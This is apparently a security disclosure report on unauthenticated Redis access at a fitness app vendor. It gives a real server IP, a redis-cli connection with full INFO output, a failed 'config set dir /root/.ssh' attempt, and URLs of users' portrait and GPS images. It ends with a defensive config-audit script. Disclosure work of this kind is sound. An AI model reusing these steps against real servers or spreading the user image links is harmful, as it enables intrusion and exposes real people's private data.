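2015-12-19: Details reported to the vendor; awaiting vendor handling
2015-12-22: Vendor confirmed; details disclosed to the vendor only
2016-01-01: Details disclosed to core white hats and experts in related fields
2016-01-11: Details disclosed to regular white hats
2016-01-21: Details disclosed to intern white hats
2016-02-04: Details disclosed to the public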
Redis allows anonymous access and is exposed to the Internet.
# 1 Redis unauthorized access
redis-cli -h 211.78.245.48
redis_version:2.4.7
redis_git_sha1:00000000
redis_git_dirty:0
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.6
multiplexing_api:epoll
gcc_version:4.4.6
process_id:1041
uptime_in_seconds:63210637
uptime_in_days:731
lru_clock:338689
used_cpu_sys:84255.39
used_cpu_user:33401.28
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
connected_clients:60
connected_slaves:0
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:16
used_memory:11248256
used_memory_human:10.73M
used_memory_rss:427347968
used_memory_peak:178719528
used_memory_peak_human:170.44M
mem_fragmentation_ratio:37.99
mem_allocator:jemalloc-2.2.5
loading:0
aof_enabled:0
changes_since_last_save:2310025
bgsave_in_progress:0
last_save_time:1448283306
bgrewriteaof_in_progress:0
total_connections_received:5106809
total_commands_processed:500165572
expired_keys:1704644
evicted_keys:0
keyspace_hits:42944402
keyspace_misses:19498151
pubsub_channels:3
pubsub_patterns:0
latest_fork_usec:0
vm_enabled:0
role:master
db0:keys=4,expires=0
db1:keys=3385,expires=2
db3:keys=9,expires=0
db5:keys=2,expires=0
db6:keys=10,expires=0
db9:keys=976,expires=976
db10:keys=69,expires=69
db11:keys=3385,expires=1968
db12:keys=8,expires=0
db13:keys=4,expires=4
# 2 Member information disclosure
The site's images have no hotlink protection, so the girls' photos can be viewed.
http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54
http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54
http://img3tw.codoon.com/gps119397e29e21481f8a0582c358a95f92
http://img3tw.codoon.com/gpsa3bed04ac4674c88afe728f161bc6cde
http://img3tw.codoon.com/gpscd3efffd8caa4ef090861e8f27a2f59b
http://img3tw.codoon.com/gpsda6e429df95145369421e2c2ab26eaab
Email address disclosure (user profile records):
config set dir /root/.ssh
(error) ERR Changing directory: Permission denied
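Added example (not part of the original report and not the vendor's code): a small Python audit of a redis.conf for the settings behind this finding, namely listening on all interfaces, no requirepass, and CONFIG left available to clients. Both sample configs are constructed, and the names parse_conf and audit are hypothetical.

```python
import shlex

# Constructed sample configs (not taken from the reported host).
WEAK_CONF = """\
port 6379
bind 0.0.0.0
"""

HARDENED_CONF = """\
port 6379
bind 127.0.0.1 10.0.0.5
requirepass "long-random-secret-loaded-from-a-vault"
rename-command CONFIG ""
"""

ALL_INTERFACES = {"0.0.0.0", "::", "*", "::*"}


def parse_conf(text):
    """Return {directive: [argument lists]} for a redis.conf body."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # honours quoted values such as ""
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit(text):
    """List the settings that leave Redis open in the way the report shows."""
    conf = parse_conf(text)
    findings = []
    # With no bind line Redis listens on every interface.
    binds = [a.lstrip("-") for args in conf.get("bind", []) for a in args]
    if not binds or ALL_INTERFACES.intersection(binds):
        findings.append("listens on all interfaces")
    # The last requirepass wins; an empty value disables authentication.
    passwords = conf.get("requirepass", [])
    if not passwords or not passwords[-1] or not passwords[-1][0]:
        findings.append("no requirepass: anonymous clients accepted")
    # The report shows an anonymous client issuing CONFIG SET dir.
    renamed = {a[0].upper() for a in conf.get("rename-command", []) if len(a) == 2}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed or disabled")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf))
```

The Permission denied reply above indicates the Redis process could not write to /root/.ssh; running Redis under a dedicated unprivileged account is a separate control that a config audit like this does not check.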
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-12-22 08:28
Vulnerability confirmed
None yet